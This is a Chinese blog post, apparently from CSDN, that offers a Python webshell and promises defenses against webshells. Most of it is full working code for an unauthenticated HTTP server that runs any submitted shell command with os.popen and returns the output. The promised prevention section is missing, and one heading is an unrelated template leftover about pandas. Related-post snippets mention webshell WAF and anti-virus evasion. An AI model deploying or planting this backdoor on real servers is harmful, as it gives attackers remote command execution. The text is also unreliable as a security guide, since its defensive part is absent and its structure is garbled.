使用Python编写webshell及防范措施

于 2024-07-17 14:58:06 发布
阅读量324 收藏 3
点赞数 11
文章标签: python web安全 安全 网络攻击模型 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/theoxiong/article/details/140493721
版权

本文使用python编写一个简单的webshell脚本,并讨论如何防范webshell。

 

前言

        在渗透测试和网络安全领域,Webshell是一种用于远程控制和管理受害服务器的工具。Webshell通常是一个脚本,通过网页服务器提供的服务来执行命令和操作文件系统。在这篇博客中,我们将深入探讨如何使用Python编写一个简单的Webshell,并详细分析其工作原理。同时,我们还会讨论一些重要的安全措施,以防止服务器被Webshell攻击。

一、pandas是什么?

        Webshell是一个小型的服务器端脚本,通常嵌入在被攻击的Web服务器上。它允许攻击者通过HTTP请求在服务器上执行命令,从而实现对服务器的远程控制。常见的Webshell语言包括PHP、ASP、JSP和Python。

二、编写

代码如下(Python编写的WebShell可以为您提供远程访问和控制服务器的能力。然而,出于道德和法律考虑,我只能为提供用于教育和安全测试目的的代码示例。请确保仅在合法且得到授权的环境中使用它们):

import http.server
import socketserver
import os

PORT = 8000

class WebShellHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # 显示一个简单的表单,提交命令到服务器
        if self.path == '/':
            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()
            self.wfile.write(b'''
                <html>
                    <body>
                        <form action="/cmd" method="post">
                            Command: <input type="text" name="cmd">
                            <input type="submit" value="Execute">
                        </form>
                    </body>
                </html>
            ''')
        else:
            self.send_error(404, "File not found")

    def do_POST(self):
        # 执行表单提交的命令并返回结果
        if self.path == '/cmd':
            content_length = int(self.headers['Content-Length'])
            post_data = self.rfile.read(content_length).decode()
            command = post_data.split('=')[1]

            self.send_response(200)
            self.send_header('Content-type', 'text/html')
            self.end_headers()

            try:
                output = os.popen(command).read()
                self.wfile.write(b'<html><body>')
                self.wfile.write(b'<pre>' + output.encode() + b'</pre>')
                self.wfile.write(b'<a href="/">Back</a>')
                self.wfile.write(b'</body></html>')
            except Exception as e:
                self.wfile.write(b'<html><body>')
                self.wfile.write(b'<pre>' + str(e).encode() + b'</pre>')
                self.wfile.write(b'<a href="/">Back</a>')
                self.wfile.write(b'</body></html>')

with socketserver.TCPServer(("", PORT), WebShellHandler) as httpd:
    print(f"Serving on port {PORT}")
    httpd.serve_forever()

三.说明 

  • 导入模块:我们导入了http.serversocketserver模块,用于创建HTTP服务器。
  • 设置端口:我们设置服务器端口为8000。
  • 定义请求处理程序:我们创建了一个继承自http.server.SimpleHTTPRequestHandler的类WebShellHandler,重载了do_GETdo_POST方法。
    • do_GET方法用于显示一个包含命令输入表单的网页。
    • do_POST方法接收表单提交的命令,执行命令并将结果返回给客户端。
  • 启动服务器:我们使用socketserver.TCPServer创建服务器,并使用httpd.serve_forever()使其持续运行。

         

theoxiong
关注
  • 11
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ASP WebShell 后门脚本与免杀
悦分享
08-01 1979
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。......
WebShell 木马免杀过WAF
悦分享
08-02 598
什么是WAFWaf是web应用防火墙(WebApplicationFirewa‖l)的简称,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为web应用提供防护,也称作应用防火墙,是网络安全纵深防御体系里重要的一环。waf属于检测型及纠正型防御控制措施。waf分为硬件waf、软件waf(ModSecurity)、代码级waf。WAF的原理waf对请求的内容进行规则匹配、行为分析等识别出恶意行为,并执行相关动作,这些动作包括阻断、记录、告警等。...
webshell
prodigal11的博客
02-05 1042
Webshell实现与隐藏探究 一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利
什么是Webshell
美奇软件开发工作室
10-13 3986
一、什么是Webshell? 顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站目录下正常的网页文件混在
PHP安全之webshell和后门检测
云博客_资源宝分享
09-26 4345
基于PHP的应用面临着各种各样的攻击: XSS:对PHP的Web应用而言,跨站脚本是一个易受攻击的点。攻击者可以利用它盗取用户信息。你可以配置Apache,或是写更安全的PHP代码(验证所有用户输入)来防范XSS攻击 SQL注入:这是PHP应用中,数据库层的易受攻击点。防范方式同上。常用的方法是,使用mysql_real_escape_string()对参数进行转义,而后进行SQL查询。 文件上传:它可以让访问者在服务器上放置(即上传)文件。这会造成例如,删除服务器文件、数据库,获取用户信息等一系列问题。你
PHP的webshell免杀
Devotedakura的博客
08-15 250
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!WAF(Web 应用程序防火墙)通过过滤和监控 Web 应用程序与互联网之间的HTTP流量来帮助保护 Web 应用程序。它通常可以保护 Web 应用程序,使其免受跨站点伪造跨站点脚本 (XSS)、文件包含、SQL 注入及其他一些攻击的影响。
渗透系列:Webshell的介绍及工具的使用(web安全系列)
weixin_54626591的博客
01-14 111
Webshell的介绍及工具的使用(web安全系列)
ICSL WEB攻击模式及防范方法
c648877527的博客
05-31 1508
1.XSS攻击 ​ 跨站脚本攻击(Cross Site Scripting)是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。 1.1 反射型XSS ​ 反射性XSS有称为非持久型XSS(Non-Persistent XSS)。当某个站点存在XSS漏洞时,这种攻击会通过URL注入攻击脚本,只有当用户访问这个URL是才会执行攻击脚本。 1.1.1 URL请求串、请求体中的参数值在
WebShell
热门推荐
高飞的博客
03-06 11万+
webshell
python开源webshell
04-01
python语言开发的开源webshell
基于python开发的webshell检测工具
06-28
【作品名称】:基于python开发的webshell检测工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 使用说明 Usage: ...
python脚本实现查找webshell的方法
12-25
本文讲述了一个python查找 webshell脚本的代码,除了查找webshell功能之外还具有白名单功能,以及发现恶意代码发送邮件报警等功能,感兴趣的朋友可以自己测试一下看看效果。 具体的功能代码如下: #!/usr/bin/env ...
PHP webshell检查工具 python实现代码
01-20
1.使用方法:find.py 目录名称 2. 主要是采用python正则表达式来匹配的,可以在keywords中添加自己定义的正则,格式: [“eval\(\$\_POST”,”发现PHP一句话木马!”] #前面为正则,后面为对这个正则的描述,会在...
python webShell
07-16
WebShell python实现 支持文件管理,命令执行,系统变量,python代码执行。
【持续集成_05课_Linux部署SonarQube及结合开发项目部署】
weixin_42333261的博客
07-12 307
前置条件:sonarQube不能使用root账号进行启动,所以需要创建普通用户及。3)CMD上传qube文件-不能传到home路径下哦。2)添加用户、组名、密码。4)检查并解压上传的包。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 944
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
Python每日一题:回文数
最新发布
xiongxiaoxuan的博客
07-16 110
回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。例如,121 是回文,而 123 不是。给你一个整数 x ,如果 x 是一个回文整数,返回 true;否则,返回 false。解释:从左向右读, 为 -121。从右向左读, 为 121-。因此它不是一个回文数。先将整数x转化为字符串形式,判断x和它的反转形态是否完全相等。解释:从右向左读, 为 01。需注意:True和False首字母大写!提示:-231
CV06_Canny边缘检测算法和python实现
https://github.com/foxpup11?tab=repositories
07-11 881
https://www.bilibili.com/video/BV1qU4y1U7aK/?spm_id_from=333.337.search-card.all.click&vd_source=7dace3632125a1ef7fd32c285eb2fbac
python webshell
07-27
Python WebShell是一种在Web服务器上运行的Python脚本,它可以通过Web界面与服务器进行交互并执行命令。Python WebShell通常用于服务器管理和维护,以及在远程服务器上执行命令和脚本。 需要注意的是,WebShell具有潜在的安全风险,因为它可以允许未经授权的访问者执行命令和操作服务器。因此,在使用WebShell时需要谨慎,并采取适当的安全措施来保护服务器。 如果你想了解如何编写一个简单的Python WebShell,我可以给你一些基本的思路和步骤,但请确保你使用它的目的合法,并且在安全环境中进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值